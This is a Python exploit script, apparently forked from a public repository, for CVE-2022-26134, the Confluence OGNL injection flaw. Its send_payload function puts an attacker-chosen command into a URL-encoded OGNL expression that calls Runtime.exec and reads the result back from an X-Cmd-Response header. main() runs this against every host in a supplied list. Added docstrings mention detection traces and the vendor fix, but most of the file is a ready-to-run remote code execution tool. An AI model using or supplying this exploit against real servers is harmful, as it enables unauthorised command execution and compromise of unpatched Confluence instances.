forked from abhishekmorla/CVE-2022-26134
CVE-2022-26134.py
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
# Silence urllib3's warnings for the whole process. Every request in this file
# passes verify=False, which would otherwise emit an InsecureRequestWarning per
# call; certificate validation itself stays disabled.
urllib3.disable_warnings()
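def banner():
    """Print the script's ASCII-art banner and its two-line tagline.

    The text is wrapped in ANSI SGR sequences (``1;94`` before, ``1;`` after),
    so a terminal that honours them renders the banner in colour.

    Returns:
        None. ``print`` yields no value, and that is what is passed back.
    """
    # Raw string: the art contains backslash pairs such as \_ , \| and \/ that
    # are not valid escape sequences. In a normal literal they only survive
    # because Python keeps unknown escapes verbatim, and newer interpreters warn
    # about them. The raw form produces the same text without the warning.
    CVE_2022_26134Logo = r"""
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
FOR EDUCATIONAL PURPOSE ONLY.
Execute command if ip is vulnerable
"""
    return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))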
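def check_target_version(host):
    """Read the build string a Confluence login page shows in its footer.

    Requests ``{host}/login.action`` and extracts the text of the
    ``footer-build-information`` span. Nothing else in this file calls this
    function. For a defender the value is useful for comparing an instance
    against the vendor advisory for CVE-2022-26134. A missing span only means
    the footer did not expose it, not that the instance is patched.

    Args:
        host: Base URL of the instance. It is formatted directly into the
            request URL, so it presumably needs a scheme and no trailing slash.

    Returns:
        Four different kinds of value, which callers must tell apart:
        the span text (``str``) on a 200 response that contains the span;
        ``0`` on a 200 response without it; ``host`` unchanged on any other
        status code; ``False`` when the request or the parsing raised.
    """
    try:
        # verify=False: the certificate is not validated, so the answer is only
        # as trustworthy as the network path to the host.
        response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
        if response.status_code != 200:
            return host
        filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
        if not filter_version:
            return 0
        # Keep only what sits between the opening tag's "'>" and the first "</".
        return filter_version[0].split("'>")[1].split('</')[0]
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit. Ordinary request or parsing errors still map to False.
        return False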
def send_payload(host, command):
    """Send the CVE-2022-26134 proof-of-concept request and return its echo.

    The request path is a URL-encoded ``${...}`` OGNL expression with
    ``command`` formatted into it. The expression is written to copy the
    command's output into an ``X-Cmd-Response`` response header, which this
    function reads back.

    What this leaves for detection: access or proxy logs with request paths
    that start with ``%24%7B`` and name ``java.lang.Runtime``, answered by a
    302 whose headers include ``X-Cmd-Response``. Mitigation is the vendor's
    fixed release for this CVE.

    Args:
        host: Base URL the encoded expression is appended to.
        command: Text placed between the quotes of the ``exec(...)`` call.

    Returns:
        The ``X-Cmd-Response`` header value when the status is 302 and the
        header is present; the string ``"0"`` otherwise. Errors raised by the
        request itself are not caught here and reach the caller.
    """
    encoded_expression = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
    url = "{}/{}/".format(host, encoded_expression)
    # verify=False skips certificate validation. Redirects are not followed
    # because the header of interest is on the 302 itself.
    reply = requests.get(url, verify=False, allow_redirects=False)
    try:
        if reply.status_code != 302:
            return "0"
        return reply.headers["X-Cmd-Response"]
    except:
        # A missing header (or anything else raised above) reads as "no result".
        return "0"
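def main():
    """Command-line entry point: run one command against each listed host.

    Expects two arguments: the path to a text file with one host per line, and
    the command text passed on to ``send_payload``. With fewer arguments it
    prints the usage lines and returns. For each line of the file it calls
    ``send_payload`` and prints the host with the returned text whenever the
    result is not the ``"0"`` sentinel.

    Returns:
        None.
    """
    banner()
    if len(sys.argv) < 3:
        print("\033[1;94mHow to use:\033[1;m")
        print("ex: python3 {} list_of_ip id".format(sys.argv[0]))
        return
    target = sys.argv[1]
    cmd = sys.argv[2]
    # Context manager so the list file is closed when the loop ends; the
    # original left the handle open for the life of the process.
    with open(target, "r") as hosts:
        for ip in hosts:
            try:
                exec_payload = send_payload(ip.strip(), cmd)
                if exec_payload != "0":
                    print("IP: " + ip.strip() + " " + exec_payload)
            except Exception:
                # Per-host failures are skipped so one bad entry does not end
                # the run. Exception rather than a bare except, so Ctrl-C and
                # SystemExit stop the loop instead of being swallowed.
                pass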
# Run main() only when the file is executed as a script, so importing the
# module has no effect beyond the definitions and the warning suppression above.
if __name__ == "__main__":
    main()